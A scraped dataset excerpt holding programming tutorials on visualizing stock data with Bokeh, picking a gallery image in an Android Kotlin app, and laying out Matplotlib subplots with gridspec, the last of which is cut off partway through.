title
stringlengths
3
221
text
stringlengths
17
477k
parsed
listlengths
0
3.17k
Python Bokeh – Visualizing Stock Data - GeeksforGeeks
03 Jul, 2020 Bokeh is a Python interactive data visualization. It renders its plots using HTML and JavaScript. It targets modern web browsers for presentation providing elegant, concise construction of novel graphics with high-performance interactivity.Bokeh can be used to visualize stock market data. Visualization is be done using the plotting module. Here we will be using the sample stock datasets given to us by Bokeh. To download the sample datasets run the following command on the command line : bokeh sampledata Alternatively, we can also execute the following Python code : import bokeh bokeh.sampledata.download() In the sample data provided by Bokeh, there are datasets of the stocks of the following companies : AAPL which is Apple FB which is Facebook GOOG which is Google IBM which is International Business Machines MSFT which is Microsoft Corporation All these datasets are available as CSV files. Below is a glimpse into the IBM.csv file : Date Open High Low Close Volume Adj Close 01-03-2000 102 105.5 100.06 100.25 10807800 84.48 02-03-2000 100.5 105.44 99.5 103.12 11192900 86.9 03-03-2000 107.25 110 106.06 108 10162800 91.01 06-03-2000 109.94 111 101 103.06 10747400 86.85 07-03-2000 106 107 101.69 103 10035100 86.8 The file contains the stock data between the years 2000 and 2013 with over 3000 entries. We will be plotting a line graph which will track the closing price of the stocks between the years 2000 and 2013 of all the 5 available companies. Import the required modules :numpyfigure, output_file and show from bokeh.plottingAAPL, FB, GOOG, IBM and MSFT from bokeh.sampledata.stocksInstantiate a figure object with the title and axis types.Give the names to x-axis and y-axis.Plot line graphs for all the 5 companies.Display the model. Import the required modules :numpyfigure, output_file and show from bokeh.plottingAAPL, FB, GOOG, IBM and MSFT from bokeh.sampledata.stocks numpy figure, output_file and show from bokeh.plotting AAPL, FB, GOOG, IBM and MSFT from bokeh.sampledata.stocks Instantiate a figure object with the title and axis types. Give the names to x-axis and y-axis. Plot line graphs for all the 5 companies. Display the model. # importing the modulesimport numpy as npfrom bokeh.plotting import figure, output_file, showfrom bokeh.sampledata.stocks import AAPL, FB, GOOG, IBM, MSFT # the file to save the modeloutput_file("gfg.html") # instantiating the figure objectgraph = figure(x_axis_type = "datetime", title = "Stock Closing Prices") # name of the x-axisgraph.xaxis.axis_label = 'Date' # name of the y-axisgraph.yaxis.axis_label = 'Price (in USD)' # plotting the line graph for AAPLx_axis_coordinates = np.array(AAPL['date'], dtype = np.datetime64)y_axis_coordinates = AAPL['adj_close']color = "lightblue"legend_label = 'AAPL'graph.line(x_axis_coordinates, y_axis_coordinates, color = color, legend_label = legend_label) # plotting the line graph for FBx_axis_coordinates = np.array(FB['date'], dtype = np.datetime64)y_axis_coordinates = FB['adj_close']color = "black"legend_label = 'FB'graph.line(x_axis_coordinates, y_axis_coordinates, color = color, legend_label = legend_label) # plotting the line graph for GOOGx_axis_coordinates = np.array(GOOG['date'], dtype = np.datetime64)y_axis_coordinates = GOOG['adj_close']color = "orange"legend_label = 'GOOG'graph.line(x_axis_coordinates, y_axis_coordinates, color = color, legend_label = legend_label) # plotting the line graph for IBMx_axis_coordinates = np.array(IBM['date'], dtype = np.datetime64)y_axis_coordinates = IBM['adj_close']color = "darkblue"legend_label = 'IBM'graph.line(x_axis_coordinates, y_axis_coordinates, color = color, legend_label = legend_label) # plotting the line graph for MSFTx_axis_coordinates = np.array(MSFT['date'], dtype = np.datetime64)y_axis_coordinates = MSFT['adj_close']color = "yellow"legend_label = 'MSFT'graph.line(x_axis_coordinates, y_axis_coordinates, color = color, legend_label = legend_label) # relocating the legend table to # avoid abstruction of the graphgraph.legend.location = "top_left" # displaying the modelshow(graph) Output : Data Visualization Python-Bokeh Python Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Read JSON file using Python Adding new column to existing DataFrame in Pandas Python map() function How to get column names in Pandas dataframe Python Dictionary Taking input in Python Read a file line by line in Python Enumerate() in Python How to Install PIP on Windows ? Iterate over a list in Python
[ { "code": null, "e": 24320, "s": 24292, "text": "\n03 Jul, 2020" }, { "code": null, "e": 24732, "s": 24320, "text": "Bokeh is a Python interactive data visualization. It renders its plots using HTML and JavaScript. It targets modern web browsers for presentation providing elegant, concise construction of novel graphics with high-performance interactivity.Bokeh can be used to visualize stock market data. Visualization is be done using the plotting module. Here we will be using the sample stock datasets given to us by Bokeh." }, { "code": null, "e": 24812, "s": 24732, "text": "To download the sample datasets run the following command on the command line :" }, { "code": null, "e": 24829, "s": 24812, "text": "bokeh sampledata" }, { "code": null, "e": 24892, "s": 24829, "text": "Alternatively, we can also execute the following Python code :" }, { "code": null, "e": 24934, "s": 24892, "text": "import bokeh\nbokeh.sampledata.download()\n" }, { "code": null, "e": 25034, "s": 24934, "text": "In the sample data provided by Bokeh, there are datasets of the stocks of the following companies :" }, { "code": null, "e": 25054, "s": 25034, "text": "AAPL which is Apple" }, { "code": null, "e": 25075, "s": 25054, "text": "FB which is Facebook" }, { "code": null, "e": 25096, "s": 25075, "text": "GOOG which is Google" }, { "code": null, "e": 25141, "s": 25096, "text": "IBM which is International Business Machines" }, { "code": null, "e": 25177, "s": 25141, "text": "MSFT which is Microsoft Corporation" }, { "code": null, "e": 25267, "s": 25177, "text": "All these datasets are available as CSV files. Below is a glimpse into the IBM.csv file :" }, { "code": null, "e": 25666, "s": 25267, "text": "Date Open High Low Close Volume Adj Close\n01-03-2000 102 105.5 100.06 100.25 10807800 84.48\n02-03-2000 100.5 105.44 99.5 103.12 11192900 86.9\n03-03-2000 107.25 110 106.06 108 10162800 91.01\n06-03-2000 109.94 111 101 103.06 10747400 86.85\n07-03-2000 106 107 101.69 103 10035100 86.8\n" }, { "code": null, "e": 25755, "s": 25666, "text": "The file contains the stock data between the years 2000 and 2013 with over 3000 entries." }, { "code": null, "e": 25903, "s": 25755, "text": "We will be plotting a line graph which will track the closing price of the stocks between the years 2000 and 2013 of all the 5 available companies." }, { "code": null, "e": 26196, "s": 25903, "text": "Import the required modules :numpyfigure, output_file and show from bokeh.plottingAAPL, FB, GOOG, IBM and MSFT from bokeh.sampledata.stocksInstantiate a figure object with the title and axis types.Give the names to x-axis and y-axis.Plot line graphs for all the 5 companies.Display the model." }, { "code": null, "e": 26336, "s": 26196, "text": "Import the required modules :numpyfigure, output_file and show from bokeh.plottingAAPL, FB, GOOG, IBM and MSFT from bokeh.sampledata.stocks" }, { "code": null, "e": 26342, "s": 26336, "text": "numpy" }, { "code": null, "e": 26391, "s": 26342, "text": "figure, output_file and show from bokeh.plotting" }, { "code": null, "e": 26449, "s": 26391, "text": "AAPL, FB, GOOG, IBM and MSFT from bokeh.sampledata.stocks" }, { "code": null, "e": 26508, "s": 26449, "text": "Instantiate a figure object with the title and axis types." }, { "code": null, "e": 26545, "s": 26508, "text": "Give the names to x-axis and y-axis." }, { "code": null, "e": 26587, "s": 26545, "text": "Plot line graphs for all the 5 companies." }, { "code": null, "e": 26606, "s": 26587, "text": "Display the model." }, { "code": "# importing the modulesimport numpy as npfrom bokeh.plotting import figure, output_file, showfrom bokeh.sampledata.stocks import AAPL, FB, GOOG, IBM, MSFT # the file to save the modeloutput_file(\"gfg.html\") # instantiating the figure objectgraph = figure(x_axis_type = \"datetime\", title = \"Stock Closing Prices\") # name of the x-axisgraph.xaxis.axis_label = 'Date' # name of the y-axisgraph.yaxis.axis_label = 'Price (in USD)' # plotting the line graph for AAPLx_axis_coordinates = np.array(AAPL['date'], dtype = np.datetime64)y_axis_coordinates = AAPL['adj_close']color = \"lightblue\"legend_label = 'AAPL'graph.line(x_axis_coordinates, y_axis_coordinates, color = color, legend_label = legend_label) # plotting the line graph for FBx_axis_coordinates = np.array(FB['date'], dtype = np.datetime64)y_axis_coordinates = FB['adj_close']color = \"black\"legend_label = 'FB'graph.line(x_axis_coordinates, y_axis_coordinates, color = color, legend_label = legend_label) # plotting the line graph for GOOGx_axis_coordinates = np.array(GOOG['date'], dtype = np.datetime64)y_axis_coordinates = GOOG['adj_close']color = \"orange\"legend_label = 'GOOG'graph.line(x_axis_coordinates, y_axis_coordinates, color = color, legend_label = legend_label) # plotting the line graph for IBMx_axis_coordinates = np.array(IBM['date'], dtype = np.datetime64)y_axis_coordinates = IBM['adj_close']color = \"darkblue\"legend_label = 'IBM'graph.line(x_axis_coordinates, y_axis_coordinates, color = color, legend_label = legend_label) # plotting the line graph for MSFTx_axis_coordinates = np.array(MSFT['date'], dtype = np.datetime64)y_axis_coordinates = MSFT['adj_close']color = \"yellow\"legend_label = 'MSFT'graph.line(x_axis_coordinates, y_axis_coordinates, color = color, legend_label = legend_label) # relocating the legend table to # avoid abstruction of the graphgraph.legend.location = \"top_left\" # displaying the modelshow(graph)", "e": 28636, "s": 26606, "text": null }, { "code": null, "e": 28645, "s": 28636, "text": "Output :" }, { "code": null, "e": 28664, "s": 28645, "text": "Data Visualization" }, { "code": null, "e": 28677, "s": 28664, "text": "Python-Bokeh" }, { "code": null, "e": 28684, "s": 28677, "text": "Python" }, { "code": null, "e": 28782, "s": 28684, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 28810, "s": 28782, "text": "Read JSON file using Python" }, { "code": null, "e": 28860, "s": 28810, "text": "Adding new column to existing DataFrame in Pandas" }, { "code": null, "e": 28882, "s": 28860, "text": "Python map() function" }, { "code": null, "e": 28926, "s": 28882, "text": "How to get column names in Pandas dataframe" }, { "code": null, "e": 28944, "s": 28926, "text": "Python Dictionary" }, { "code": null, "e": 28967, "s": 28944, "text": "Taking input in Python" }, { "code": null, "e": 29002, "s": 28967, "text": "Read a file line by line in Python" }, { "code": null, "e": 29024, "s": 29002, "text": "Enumerate() in Python" }, { "code": null, "e": 29056, "s": 29024, "text": "How to Install PIP on Windows ?" } ]
How to pick an image from an image gallery on Android using Kotlin?
This example demonstrates how to pick an image from an image gallery on Android using Kotlin. Step 1 − Create a new project in Android Studio, go to File ⇒ New Project and fill all required details to create a new project. Step 2 − Add the following code to res/layout/activity_main.xml. <?xml version="1.0" encoding="utf-8"?> <LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" android:layout_width="fill_parent" android:layout_height="fill_parent" android:orientation="vertical" android:padding="2dp"> <ImageView android:id="@+id/imageView" android:layout_width="match_parent" android:layout_height="wrap_content" android:layout_weight="1" /> <Button android:id="@+id/buttonLoadPicture" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_gravity="center" android:layout_weight="0" android:text="Load Picture" /> </LinearLayout> Step 3 − Add the following code to src/MainActivity.kt import android.content.Intent import android.net.Uri import android.os.Bundle import android.provider.MediaStore import android.widget.Button import android.widget.ImageView import androidx.appcompat.app.AppCompatActivity class MainActivity : AppCompatActivity() { lateinit var imageView: ImageView lateinit var button: Button private val pickImage = 100 private var imageUri: Uri? = null override fun onCreate(savedInstanceState: Bundle?) { super.onCreate(savedInstanceState) setContentView(R.layout.activity_main) title = "KotlinApp" imageView = findViewById(R.id.imageView) button = findViewById(R.id.buttonLoadPicture) button.setOnClickListener { val gallery = Intent(Intent.ACTION_PICK, MediaStore.Images.Media.INTERNAL_CONTENT_URI) startActivityForResult(gallery, pickImage) } } override fun onActivityResult(requestCode: Int, resultCode: Int, data: Intent?) { super.onActivityResult(requestCode, resultCode, data) if (resultCode == RESULT_OK && requestCode == pickImage) { imageUri = data?.data imageView.setImageURI(imageUri) } } } Step 4 − Add the following code to androidManifest.xml <?xml version="1.0" encoding="utf-8"?> <manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.q11"> <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/> <application android:allowBackup="true" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:roundIcon="@mipmap/ic_launcher_round" android:supportsRtl="true" android:theme="@style/AppTheme"> <activity android:name=".MainActivity"> <intent-filter> <action android:name="android.intent.action.MAIN" /> <category android:name="android.intent.category.LAUNCHER" /> </intent-filter> </activity> </application> </manifest> Let's try to run your application. I assume you have connected your actual Android Mobile device with your computer. To run the app from android studio, open one of your project's activity files and click the Run icon from the toolbar. Select your mobile device as an option and then check your mobile device which will display your default screen. Click here to download the project code.
[ { "code": null, "e": 1156, "s": 1062, "text": "This example demonstrates how to pick an image from an image gallery on Android using Kotlin." }, { "code": null, "e": 1285, "s": 1156, "text": "Step 1 − Create a new project in Android Studio, go to File ⇒ New Project and fill all required details to create a new project." }, { "code": null, "e": 1350, "s": 1285, "text": "Step 2 − Add the following code to res/layout/activity_main.xml." }, { "code": null, "e": 2028, "s": 1350, "text": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<LinearLayout xmlns:android=\"http://schemas.android.com/apk/res/android\"\n android:layout_width=\"fill_parent\"\n android:layout_height=\"fill_parent\"\n android:orientation=\"vertical\"\n android:padding=\"2dp\">\n <ImageView\n android:id=\"@+id/imageView\"\n android:layout_width=\"match_parent\"\n android:layout_height=\"wrap_content\"\n android:layout_weight=\"1\" />\n <Button\n android:id=\"@+id/buttonLoadPicture\"\n android:layout_width=\"wrap_content\"\n android:layout_height=\"wrap_content\"\n android:layout_gravity=\"center\"\n android:layout_weight=\"0\"\n android:text=\"Load Picture\" />\n</LinearLayout>" }, { "code": null, "e": 2083, "s": 2028, "text": "Step 3 − Add the following code to src/MainActivity.kt" }, { "code": null, "e": 3243, "s": 2083, "text": "import android.content.Intent\nimport android.net.Uri\nimport android.os.Bundle\nimport android.provider.MediaStore\nimport android.widget.Button\nimport android.widget.ImageView\nimport androidx.appcompat.app.AppCompatActivity\nclass MainActivity : AppCompatActivity() {\n lateinit var imageView: ImageView\n lateinit var button: Button\n private val pickImage = 100\n private var imageUri: Uri? = null\n override fun onCreate(savedInstanceState: Bundle?) {\n super.onCreate(savedInstanceState)\n setContentView(R.layout.activity_main)\n title = \"KotlinApp\"\n imageView = findViewById(R.id.imageView)\n button = findViewById(R.id.buttonLoadPicture)\n button.setOnClickListener {\n val gallery = Intent(Intent.ACTION_PICK, MediaStore.Images.Media.INTERNAL_CONTENT_URI)\n startActivityForResult(gallery, pickImage)\n }\n }\n override fun onActivityResult(requestCode: Int, resultCode: Int, data: Intent?) {\n super.onActivityResult(requestCode, resultCode, data)\n if (resultCode == RESULT_OK && requestCode == pickImage) {\n imageUri = data?.data\n imageView.setImageURI(imageUri)\n }\n }\n}" }, { "code": null, "e": 3298, "s": 3243, "text": "Step 4 − Add the following code to androidManifest.xml" }, { "code": null, "e": 4044, "s": 3298, "text": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<manifest xmlns:android=\"http://schemas.android.com/apk/res/android\" package=\"com.example.q11\">\n<uses-permission android:name=\"android.permission.READ_EXTERNAL_STORAGE\"/>\n <application\n android:allowBackup=\"true\"\n android:icon=\"@mipmap/ic_launcher\"\n android:label=\"@string/app_name\"\n android:roundIcon=\"@mipmap/ic_launcher_round\"\n android:supportsRtl=\"true\"\n android:theme=\"@style/AppTheme\">\n <activity android:name=\".MainActivity\">\n <intent-filter>\n <action android:name=\"android.intent.action.MAIN\" />\n <category android:name=\"android.intent.category.LAUNCHER\" />\n </intent-filter>\n </activity>\n </application>\n</manifest>" }, { "code": null, "e": 4393, "s": 4044, "text": "Let's try to run your application. I assume you have connected your actual Android Mobile device with your computer. To run the app from android studio, open one of your project's activity files and click the Run icon from the toolbar. Select your mobile device as an option and then check your mobile device which will display your default screen." }, { "code": null, "e": 4434, "s": 4393, "text": "Click here to download the project code." } ]
Customizing Multiple Subplots in Matplotlib | by Rizky Maulana N | Towards Data Science
In certain times, we need to visualize our data into complex plots because we should do it or make a great plot. For example, you want to make a zoom effect in your plot, as shown in Figure 1. To present it, you need to build a convoluted subplot. Figure 1 is built from three different axes: axes1, axes2, and axes3. Axes1 is on the top-left panel, showing the data in green plot lines, axes2 is on the top-right panel with orange lines, and the biggest one, axes3 lies on the bottom panel. Before creating complex plots, you need to know the difference between the terms figure and axes in Matplotlib. To do it, you can learn about the anatomy of a figure defined in Matplotlib, as shown in Figure 2. Figure is defined as the main container for all elements, such as axes, legend, title, etc. A figure can contain some axes (we will learn in more in-depth about it). In Figure 1, we have only one figure, which contains three axes. If you want to create a zoom effect in Maptlotlib, you visit this link. towardsdatascience.com In this section, we will learn about the fundamental of the subplot in Matplotlib. Some examples that I will show you are not realistic plots, but it will become good examples to understand the subplot. To create axes, you can use at least two different methods. First, you can use the syntax subplot, and the second one is using gridspec. At the beginning of the learning subplot, I will show you a simple subplot, as shown in Figure 3. You can generate Figure 3 using the following code import matplotlib.pyplot as pltfig = plt.figure()coord = 111plt.subplot(coord)plt.annotate('subplot ' + str(coord), xy = (0.5, 0.5), va = 'center', ha = 'center') One of the important things to understand the subplot in Matplotlib is defining the coordinate of the axes. The variable coord in the code above is 111. It consists of three numbers representing the number of rows, columns, and the axes’ sequence. coord 111 means, you generate a figure that consists of one row, one column, and you insert the subplot in the first sequence axes. Because you only have one row and one column (it means you only have one cell), your axes are the main figure. You also can generate Figure 3 without subplot syntax because you only generate one axes in a figure. Next step is creating two horizontal axes in a figure, as shown in Figure 4. You can use this code to generate it fig = plt.figure(figsize=(12, 4))coord1 = 121coord2 = 122plt.subplot(coord1)plt.annotate('subplot ' + str(coord1), xy = (0.5, 0.5), va = 'center', ha = 'center')plt.subplot(coord2)plt.annotate('subplot ' + str(coord2), xy = (0.5, 0.5), va = 'center', ha = 'center') You need to define the figure size to create a nice two horizontal axes. If you did not do it, you would get a figure like a Figure 5. If you want to create two vertical axes, you just change the coord1 and coord2, as shown in the following code fig = plt.figure(figsize=(6, 7))coord1 = 211coord2 = 212plt.subplot(coord1)plt.annotate('subplot ' + str(coord1), xy = (0.5, 0.5), va = 'center', ha = 'center')plt.subplot(coord2)plt.annotate('subplot ' + str(coord2), xy = (0.5, 0.5), va = 'center', ha = 'center') Now, I will try to create more subplot in a figure using looping. I will create 2x4 axes, as shown in Figure 6. You can reproduce Figure 6 using this code fig = plt.figure(figsize=(16, 6))coord = []# create coord array from 241, 242, 243, ..., 248 for i in range(1, 9): # in python, 9 is not included row = 2 column = 4 coord.append(str(row)+str(column)+str(i)) # create subplot 241, 242, 243, ..., 248for i in range(len(coord)): plt.subplot(coord[i]) plt.annotate('subplot ' + str(coord[i]), xy = (0.5, 0.5), va = 'center', ha = 'center') Because you want to create 8 axes (2 rows and 4 columns), so you need to make an array from 241 to 248. After that, create the subplot using the same procedure with the previous code, but place it in looping syntax. As I mentioned before, besides using subplot to create some axes in a figure, you can also use gridspec. For example, if you want to create Figure 6 (two rows and 4 columns) with gridspec, you can use this code import matplotlib.pyplot as pltfig = plt.figure(figsize=(16, 6))rows = 2columns = 4grid = plt.GridSpec(rows, columns, wspace = .25, hspace = .25)for i in range(rows*columns): exec (f"plt.subplot(grid{[i]})") plt.annotate('subplot 24_grid[' + str(i) + ']', xy = (0.5, 0.5), va = 'center', ha = 'center') To create simple subplot using gridspec, you define the number of rows and columns in the beginning. To embed the subplot into figure, you just call the number of subplot. In gridspec, number of subplot is starting from 0, not 1. So, if you want to embed 8 columns in a figure using gridspec, you need to call them from 0 to 7, using plt.subplot(grid[0]) until plt.subplot(grid[7]). In the looping, you will get an issue because you want to call grid number using []. To deal with it, you can use syntax exec (f”...{[i]}”). Figure 7 is the result of creating 8 axes using gridspec One of the advantages of using gridspec is you can create more subplots in an easier way than that using subplot only. For example, if you want to create more than 10 subplots in a figure, you will define the last coordinates. The subplot only consists of three numbers, e.g., 111, 428, 439, etc. A subplot can not facilitate the fourth. For example, you want to create 18 axes (3 rows and 6 columns) in a figure. If you use subplot only, you need to define 361, 362, 263, ..., 3616. You will face the error when you embed a subplot of 3610. To solve it, you can use gridspec. Figure 8 is presenting the creation of 18 axes using gridspec. You can create Figure 8 with this code fig = plt.figure(figsize=(22, 8))rows = 3columns = 6grid = plt.GridSpec(rows, columns, wspace = .25, hspace = .25)for i in range(rows*columns): exec (f"plt.subplot(grid{[i]})") plt.annotate('subplot 36_grid[' + str(i) + ']', xy = (0.5, 0.5), va = 'center', ha = 'center') To make a more realistic example, I will insert a plot for each axes in Figure 8. So, I need to make 18 different functions for each axes. It is compiled from the function of sin(x^(i/9)), with i is the grid number from 0 to 17. You can see the plot in Figure 9. To create Figure 9, you can use the following code fig = plt.figure(figsize=(25, 10))color = ['#00429d', '#2754a6', '#3a67ae', '#487bb7', '#548fc0', '#5ea3c9', '#66b8d3', '#6acedd', '#68e5e9', '#ffe2ca', '#ffc4b4', '#ffa59e', '#f98689', '#ed6976', '#dd4c65', '#ca2f55', '#b11346', '#93003a']rows = 3columns = 6grid = plt.GridSpec(rows, columns, wspace = .25, hspace = .25)for i in range(rows*columns): np.random.seed(100) x = np.linspace(0., 5., 100) y = np.sin(x**(i / 9)) + np.random.random() * i exec (f"plt.subplot(grid{[i]})") plt.plot(x, y, color = color[i]) To present in different colors, you also need to define 18 different colors. You can generate it using this link. I have explained how to use it in the following link. towardsdatascience.com In this section, we will learn about customizing complicated axes using add_subplot and GridSpec. The complicated axes I mentioned are shown in Figure 10. We will create 3 axes (2 on the top, 1 on the bottom panel) as shown in Figure 1 using add_subplot syntax. You can use this code to create it. If you analyze the code, you will get a similar concept with the subplot syntax concept. There are three coordinates you need to define, e.g., (2, 2, 1) or (2, 2, (3, 4)). The axes sub1 is placed in the first axes (1) on the figure that consists of 2 rows and 2 columns. sub2 has similar schemes with sub1. The important one is sub3, which the combination between axes 3 and 4. So, the coordinate of sub3 is (2, 2, (3, 4)). If you run the code above, you will get a result, as shown in Figure 11. If you want to add a plot for each ax, you can add this code after defining sub1, sub2, and sub3. sub1.plot(x, y)sub2.plot(x, y)sub3.plot(x, y) The full code is here. You will get a result, as shown in Figure 12. As an alternative, you can also create Figure 12 using gridspec syntax. Here is the code you can use to create it. The code creates 2 rows and 2 columns. sub1 and sub2 are placed on the first row, column 0 and column 1 (remember that gridspec is started from 0 indexes). sub3 is placed on the second row and takes all of the columns, represented by :. You will get the same plot, as shown in Figure 12, if you run the code above. The second example of complicated axes is shown in Figure 13. You will generate four axes in a figure: sub1, sub2, sub3, and sub4, in 2 rows and 4 columns. sub1 takes all the columns in the first row. sub2, sub3, and sub4 are placed on each column in the second row. To generate Figure 12, you can use this code. To create Figure 12 using gridspec, you can use this code. I think the code above is clear enough to be understood :D. The code will generate a plot, as shown in Figure 14. The third example is shown in Figure 15. To create Figure 15, you can use this code. To create Figure 15 using gridspec, you can use this code. The result is shown in Figure 16. In the last example, you will be guided to create 6 axes in a figure, with the number of rows is 4 and columns is 2. It is shown in Figure 17. To create it with add_subplot, you can use the following code. To create Figure 17 with gridspec, you can use this code. You need to pay attention to sub4, which is placed in rows 1:3 and column 1. Rows 1:3 means that sub4 will take rows number 1 and 2. Remember, rows 3 is not included. The code will generate a plot, as shown in Figure 17. Creating a complex plot to visualize your data is needed while you are working with complex data. I hope this story can help you to visualize your data from a different point of view. If you need to create scientific publication plots with Matplotlib, you can visit this link. towardsdatascience.com towardsdatascience.com towardsdatascience.com towardsdatascience.com towardsdatascience.com That’s all. Thanks for reading this story. Comment and share if you like it. I also recommend you follow my account to get a notification when I post my new story.
[ { "code": null, "e": 664, "s": 172, "text": "In certain times, we need to visualize our data into complex plots because we should do it or make a great plot. For example, you want to make a zoom effect in your plot, as shown in Figure 1. To present it, you need to build a convoluted subplot. Figure 1 is built from three different axes: axes1, axes2, and axes3. Axes1 is on the top-left panel, showing the data in green plot lines, axes2 is on the top-right panel with orange lines, and the biggest one, axes3 lies on the bottom panel." }, { "code": null, "e": 875, "s": 664, "text": "Before creating complex plots, you need to know the difference between the terms figure and axes in Matplotlib. To do it, you can learn about the anatomy of a figure defined in Matplotlib, as shown in Figure 2." }, { "code": null, "e": 1178, "s": 875, "text": "Figure is defined as the main container for all elements, such as axes, legend, title, etc. A figure can contain some axes (we will learn in more in-depth about it). In Figure 1, we have only one figure, which contains three axes. If you want to create a zoom effect in Maptlotlib, you visit this link." }, { "code": null, "e": 1201, "s": 1178, "text": "towardsdatascience.com" }, { "code": null, "e": 1404, "s": 1201, "text": "In this section, we will learn about the fundamental of the subplot in Matplotlib. Some examples that I will show you are not realistic plots, but it will become good examples to understand the subplot." }, { "code": null, "e": 1639, "s": 1404, "text": "To create axes, you can use at least two different methods. First, you can use the syntax subplot, and the second one is using gridspec. At the beginning of the learning subplot, I will show you a simple subplot, as shown in Figure 3." }, { "code": null, "e": 1690, "s": 1639, "text": "You can generate Figure 3 using the following code" }, { "code": null, "e": 1853, "s": 1690, "text": "import matplotlib.pyplot as pltfig = plt.figure()coord = 111plt.subplot(coord)plt.annotate('subplot ' + str(coord), xy = (0.5, 0.5), va = 'center', ha = 'center')" }, { "code": null, "e": 2446, "s": 1853, "text": "One of the important things to understand the subplot in Matplotlib is defining the coordinate of the axes. The variable coord in the code above is 111. It consists of three numbers representing the number of rows, columns, and the axes’ sequence. coord 111 means, you generate a figure that consists of one row, one column, and you insert the subplot in the first sequence axes. Because you only have one row and one column (it means you only have one cell), your axes are the main figure. You also can generate Figure 3 without subplot syntax because you only generate one axes in a figure." }, { "code": null, "e": 2560, "s": 2446, "text": "Next step is creating two horizontal axes in a figure, as shown in Figure 4. You can use this code to generate it" }, { "code": null, "e": 2826, "s": 2560, "text": "fig = plt.figure(figsize=(12, 4))coord1 = 121coord2 = 122plt.subplot(coord1)plt.annotate('subplot ' + str(coord1), xy = (0.5, 0.5), va = 'center', ha = 'center')plt.subplot(coord2)plt.annotate('subplot ' + str(coord2), xy = (0.5, 0.5), va = 'center', ha = 'center')" }, { "code": null, "e": 2961, "s": 2826, "text": "You need to define the figure size to create a nice two horizontal axes. If you did not do it, you would get a figure like a Figure 5." }, { "code": null, "e": 3072, "s": 2961, "text": "If you want to create two vertical axes, you just change the coord1 and coord2, as shown in the following code" }, { "code": null, "e": 3337, "s": 3072, "text": "fig = plt.figure(figsize=(6, 7))coord1 = 211coord2 = 212plt.subplot(coord1)plt.annotate('subplot ' + str(coord1), xy = (0.5, 0.5), va = 'center', ha = 'center')plt.subplot(coord2)plt.annotate('subplot ' + str(coord2), xy = (0.5, 0.5), va = 'center', ha = 'center')" }, { "code": null, "e": 3449, "s": 3337, "text": "Now, I will try to create more subplot in a figure using looping. I will create 2x4 axes, as shown in Figure 6." }, { "code": null, "e": 3492, "s": 3449, "text": "You can reproduce Figure 6 using this code" }, { "code": null, "e": 3895, "s": 3492, "text": "fig = plt.figure(figsize=(16, 6))coord = []# create coord array from 241, 242, 243, ..., 248 for i in range(1, 9): # in python, 9 is not included row = 2 column = 4 coord.append(str(row)+str(column)+str(i)) # create subplot 241, 242, 243, ..., 248for i in range(len(coord)): plt.subplot(coord[i]) plt.annotate('subplot ' + str(coord[i]), xy = (0.5, 0.5), va = 'center', ha = 'center')" }, { "code": null, "e": 4111, "s": 3895, "text": "Because you want to create 8 axes (2 rows and 4 columns), so you need to make an array from 241 to 248. After that, create the subplot using the same procedure with the previous code, but place it in looping syntax." }, { "code": null, "e": 4322, "s": 4111, "text": "As I mentioned before, besides using subplot to create some axes in a figure, you can also use gridspec. For example, if you want to create Figure 6 (two rows and 4 columns) with gridspec, you can use this code" }, { "code": null, "e": 4631, "s": 4322, "text": "import matplotlib.pyplot as pltfig = plt.figure(figsize=(16, 6))rows = 2columns = 4grid = plt.GridSpec(rows, columns, wspace = .25, hspace = .25)for i in range(rows*columns): exec (f\"plt.subplot(grid{[i]})\") plt.annotate('subplot 24_grid[' + str(i) + ']', xy = (0.5, 0.5), va = 'center', ha = 'center')" }, { "code": null, "e": 5155, "s": 4631, "text": "To create simple subplot using gridspec, you define the number of rows and columns in the beginning. To embed the subplot into figure, you just call the number of subplot. In gridspec, number of subplot is starting from 0, not 1. So, if you want to embed 8 columns in a figure using gridspec, you need to call them from 0 to 7, using plt.subplot(grid[0]) until plt.subplot(grid[7]). In the looping, you will get an issue because you want to call grid number using []. To deal with it, you can use syntax exec (f”...{[i]}”)." }, { "code": null, "e": 5212, "s": 5155, "text": "Figure 7 is the result of creating 8 axes using gridspec" }, { "code": null, "e": 5852, "s": 5212, "text": "One of the advantages of using gridspec is you can create more subplots in an easier way than that using subplot only. For example, if you want to create more than 10 subplots in a figure, you will define the last coordinates. The subplot only consists of three numbers, e.g., 111, 428, 439, etc. A subplot can not facilitate the fourth. For example, you want to create 18 axes (3 rows and 6 columns) in a figure. If you use subplot only, you need to define 361, 362, 263, ..., 3616. You will face the error when you embed a subplot of 3610. To solve it, you can use gridspec. Figure 8 is presenting the creation of 18 axes using gridspec." }, { "code": null, "e": 5891, "s": 5852, "text": "You can create Figure 8 with this code" }, { "code": null, "e": 6169, "s": 5891, "text": "fig = plt.figure(figsize=(22, 8))rows = 3columns = 6grid = plt.GridSpec(rows, columns, wspace = .25, hspace = .25)for i in range(rows*columns): exec (f\"plt.subplot(grid{[i]})\") plt.annotate('subplot 36_grid[' + str(i) + ']', xy = (0.5, 0.5), va = 'center', ha = 'center')" }, { "code": null, "e": 6432, "s": 6169, "text": "To make a more realistic example, I will insert a plot for each axes in Figure 8. So, I need to make 18 different functions for each axes. It is compiled from the function of sin(x^(i/9)), with i is the grid number from 0 to 17. You can see the plot in Figure 9." }, { "code": null, "e": 6483, "s": 6432, "text": "To create Figure 9, you can use the following code" }, { "code": null, "e": 7047, "s": 6483, "text": "fig = plt.figure(figsize=(25, 10))color = ['#00429d', '#2754a6', '#3a67ae', '#487bb7', '#548fc0', '#5ea3c9', '#66b8d3', '#6acedd', '#68e5e9', '#ffe2ca', '#ffc4b4', '#ffa59e', '#f98689', '#ed6976', '#dd4c65', '#ca2f55', '#b11346', '#93003a']rows = 3columns = 6grid = plt.GridSpec(rows, columns, wspace = .25, hspace = .25)for i in range(rows*columns): np.random.seed(100) x = np.linspace(0., 5., 100) y = np.sin(x**(i / 9)) + np.random.random() * i exec (f\"plt.subplot(grid{[i]})\") plt.plot(x, y, color = color[i])" }, { "code": null, "e": 7215, "s": 7047, "text": "To present in different colors, you also need to define 18 different colors. You can generate it using this 